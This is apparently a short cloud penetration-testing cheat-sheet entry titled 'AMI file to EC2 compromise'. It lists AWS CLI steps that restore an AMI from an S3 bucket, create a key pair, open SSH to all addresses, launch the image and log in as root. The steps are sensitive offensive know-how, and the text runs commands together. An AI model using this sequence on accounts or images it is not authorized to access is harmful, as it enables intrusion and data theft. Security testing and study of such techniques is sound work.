AMI Files
AMI file to EC2 compromise
aws ec2 create-restore-image-task --object-key <AMI id> --bucket <bucket> --name <arbitrary name>aws ec2 create-key-pair --key-name <arbitrary name> --query "KeyMaterial" --output text > <path>.pemaws ec2 describe-subnets
aws ec2 describe-security-groupsaws ec2 create-security-group --group-name <name> --description "<descr>" --vpc-id <subnet id>
aws ec2 authorize-security-group-ingress --group-id <security group id> --protocol tcp --port 22 --cidr 0.0.0.0/0aws ec2 run-instances --image-id <restored image ID> --instance-type t3a.micro --key-name <generated key name> --subnet-id <subnet id> --security-group-id <security group id>aws ec2 describe-instances --instance-ids <instance id> --query 'Reservations[*].Instances[*].PublicIpAddress' --output textssh -i "<key file>.pem" root@<EC2 ip address>Last updated